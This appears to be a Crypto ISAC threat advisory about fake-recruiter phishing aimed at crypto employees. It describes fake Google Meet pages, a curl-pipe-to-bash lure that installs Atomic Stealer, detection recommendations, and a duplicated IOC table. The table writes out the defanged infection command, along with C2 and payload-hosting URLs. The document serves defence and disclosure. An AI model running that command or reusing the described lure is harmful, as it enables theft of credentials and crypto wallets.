Phishing Alert: Sharp Uptick in Campaigns Targeting the Crypto Ecosystem

BlogDeep Dive

Aug 29

Executive Overview

The Crypto ISAC community is currently observing a substantial uptick in threat actors impersonating recruitment teams and senior leadership of crypto companies. These actors attempt to lure employees with fake job offers, typically sent through fraudulent meeting invitations or malicious calendar attachments. Once executed, the payloads compromise user systems, installing malware designed to harvest credentials, exfiltrate data, and establish persistent backdoor access.

If you have any questions or would like additional information, please contact us at 311@cryptoisac.org

Recommended Course of Action

Pay attention to impersonated domains which may appear as common video conferencing software - i.e. Google Meet, Zoom, etc.
Perform a retroactive search (90+ days) for the IOC’s listed at the end of this report.
Implement detections to monitor for the following activity:

Unauthorized read operations targeting the macOS login keychain database (login.keychain-db)
Direct file system access to Safari cookie stores (~/Library/Cookies/Cookies.binarycookies)
Attempts to access browser-based credential storage mechanisms
Creation of executable files within the temporary directories (/tmp/)
Shell command execution patterns involving curl-pipe-to-bash operations directed at external suspicious/malicious domains
Outbound connections to domains employing typosquatting techniques that mimic legitimate services (e.g., meet[.]google[.]com vs meet[.]google-talk[.]com)

Example Scenario

Initial Access

The victim receives a phishing email sent to their personal Gmail account, impersonating a Human Resources or Leadership contact from a cryptocurrency company. The message includes a malicious calendar invite, a social engineering tactic intended to bypass standard enterprise filtering and lure the victim into engaging with the content.

Execution

After downloading the invite and joining the fake Google Meet from their work laptop, the victim encounters a fraudulent pop-up claiming an audio issue. The pop-up directs them to run a command shared in the meeting chat. The command is a curl-pipe-to-bash one-liner, a well-known and risky method for executing arbitrary code.

Payload Delivery

Once executed, the curl-pipe-to-bash command retrieves a second-stage payload from the attacker-controlled server. This payload is identified as Atomic Stealer (AMOS), a commodity infostealer.

Impact

The Atomic Stealer compromises the endpoint by:

Capturing sensitive user data (credentials, browser data, crypto wallet information, etc.)
Preparing the data for exfiltration to a C2 server under the attacker’s control
Establishing persistence mechanisms to maintain access if the system is rebooted

Summary

This attack leverages a multi-stage phishing and social engineering chain:

Fake HR (or Leadership) email + malicious calendar invite
Social engineering in a fake meeting environment
Curl-pipe-to-bash execution leading to Atomic Stealer installation
Data theft and exfiltration to attacker infrastructure

Payload Analysis

First-Stage Payload

The initial payload is designed to deliver and execute the secondary malware. It:

Downloads a second-stage binary (“update”) into the /tmp/ directory using curl
Changes file permissions with chmod +x to make the binary executable
Immediately launches the prepared malware

Second-Stage Payload

The second-stage malware is more advanced and incorporates multiple capabilities:

Anti-analysis evasion: Detects sandbox or virtual machine environments and terminates execution if such conditions are found
Credential harvesting and privilege escalation: Extracts credentials to escalate privileges within the compromised system
Data exfiltration: Collects sensitive information across multiple sources, including:

Browser data
Cryptocurrency and desktop wallets
System data
Specific file types (JSON, wallet, TXT, PDF, and others)

Data staging and exfiltration: Prepares and transfers harvested information to an attacker-controlled C2 server
Persistence and monitoring: Installs a backdoor and wrapper for continuous monitoring and execution persistence
Trojanized applications: Identifies and modifies ledger applications with malicious code, if present
Cleanup operations: Removes artifacts to reduce detection and hinder forensic analysis

Indicators of Compromise (IOCs)

Type
Value
Context


URL
https[://]meet[.]google-talk[.]com/abc-def-ghi
Fake Google Meet phishing site

URL
https[://]help-googleworkspace[.]com/devices/macos/voice.sh
Malicious script hosting

URL
https[://]halesmp[.]com/zxc/app
Backdoor binary download

URL
https[://]halesmp[.]com/zxc/app.zip
Trojanized Ledger Live app

URL
http://45[.]94[.]47[.]144/contact
C2 exfiltration endpoint

IP Address
45[.]94[.]47[.]144
Primary C2 server

Domain
meet[.]google-talk[.]com
Phishing domain

Domain
help-googleworkspace[.]com
Malicious script hosting domain

Domain
halesmp[.]com
Payload distribution domain

File Path
/tmp/update
Second-stage payload location

File Path
/tmp/out.zip
Compressed stolen data

File Path
/tmp/.pass
Observed as part of the script

File Path
~/.agent
Persistent script

File Path
~/.username
Observed as part of the script

File Path
~/.pass
Observed as part of the script

File Path
~/.private
Observed as part of the script

File Path
/Library/LaunchDaemons/com.finder.helper.plist
Persistence LaunchDaemon

Base64 Identifier
3zeges3r1ezSNvTzatsJWSRkuxyyybH1Lq6yQLuFrT4=
Campaign login identifier

Base64 Identifier
ZEHCc3WT/cb5mS6EtLuFtLEqWtZBIzAP2HVYnyP/jvs=
Campaign Build ID identifier

Command Line
curl -s 
https[://]help-googleworkspace[.]com/devices/macos/voice.sh | bash
Initial infection command

SHA1
35a1e0aec536155732ff70ef6af313af6011ea95
Second-stage payload (/tmp/update) hash

Type	Value	Context
URL	`https[://]meet[.]google-talk[.]com/abc-def-ghi`	Fake Google Meet phishing site
URL	`https[://]help-googleworkspace[.]com/devices/macos/voice.sh`	Malicious script hosting
URL	`https[://]halesmp[.]com/zxc/app`	Backdoor binary download
URL	`https[://]halesmp[.]com/zxc/app.zip`	Trojanized Ledger Live app
URL	`http://45[.]94[.]47[.]144/contact`	C2 exfiltration endpoint
IP Address	`45[.]94[.]47[.]144`	Primary C2 server
Domain	`meet[.]google-talk[.]com`	Phishing domain
Domain	`help-googleworkspace[.]com`	Malicious script hosting domain
Domain	`halesmp[.]com`	Payload distribution domain
File Path	`/tmp/update`	Second-stage payload location
File Path	`/tmp/out.zip`	Compressed stolen data
File Path	`/tmp/.pass`	Observed as part of the script
File Path	`~/.agent`	Persistent script
File Path	`~/.username`	Observed as part of the script
File Path	`~/.pass`	Observed as part of the script
File Path	`~/.private`	Observed as part of the script
File Path	`/Library/LaunchDaemons/com.finder.helper.plist`	Persistence LaunchDaemon
Base64 Identifier	`3zeges3r1ezSNvTzatsJWSRkuxyyybH1Lq6yQLuFrT4=`	Campaign login identifier
Base64 Identifier	`ZEHCc3WT/cb5mS6EtLuFtLEqWtZBIzAP2HVYnyP/jvs=`	Campaign Build ID identifier
Command Line	`curl -s` `https[://]help-googleworkspace[.]com/devices/macos/voice.sh \| bash`	Initial infection command
SHA1	`35a1e0aec536155732ff70ef6af313af6011ea95`	Second-stage payload (`/tmp/update`) hash

About Crypto ISAC

The Crypto ISAC is a member-driven, not-for-profit organization that works together to curb malicious actors, address vulnerabilities, share intelligence, and move security forward to protect the crypto ecosystem. We are founded by leading crypto organizations and designed for cryptosecurity experts to address the security and trust challenges that face crypto today and shape the crypto ecosystem of tomorrow.

Henry Beaudin